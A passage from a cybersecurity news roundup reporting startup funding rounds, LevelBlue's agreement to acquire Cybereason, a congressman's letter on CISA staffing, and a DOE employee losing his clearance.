The round was led by Osney Capital, with participation from Superseed, Tiny.vc, and Rule30, alongside several angel investors from ForgeRock, Digital Shadows, Zscaler, Rapid7, Egress, and ComplyAdvantage. (Sofia Chesnokova / Tech Funding News)
Related: Silicon Angle, Silicon Canals
HyperBunker, a European startup focused on ransomware and critical data storage and recovery, has raised €800,000 (about $925,000) in seed funding to increase its production capacity for a new anti-ransomware device.
The funding comes from Fil Rouge Capital and Sunfish Venture Capital. (Kevin Townsend / Security Week)
Related: Tech Funding News
LevelBlue, the managed security services provider formerly known as AT&T Cybersecurity, signed a definitive agreement to acquire Cybereason, a Boston-based cybersecurity firm specializing in extended detection and response platforms and digital forensics.
LevelBlue will fold Cybereason’s extended detection and response (XDR) platform, threat intelligence team, and digital forensics and incident response (DFIR) capabilities into its managed detection and response (MDR) offerings. (Greg Otto / CyberScoop)
Related: Business Wire, CTech, Bloomberg, DataBreachToday.com, SecurityWeek
Best Thing of the Day: It's Not Nice to Weaken CISA
Rep. Eric Swalwell (D-CA) sent a letter to acting CISA Director Madhu Gottumukkala raising concerns about staffing levels and the direction of the nation’s primary cybersecurity agency, writing that the “Trump Administration has undertaken multiple efforts to decimate CISA’s workforce, undermining our nation’s cybersecurity.”
Worst Thing of the Day: This Is What Depression Does to a Person
A man who works for the people overseeing America’s nuclear stockpile lost his security clearance after he uploaded 187,000 pornographic images to a Department of Energy (DOE) network.
Closing Thought
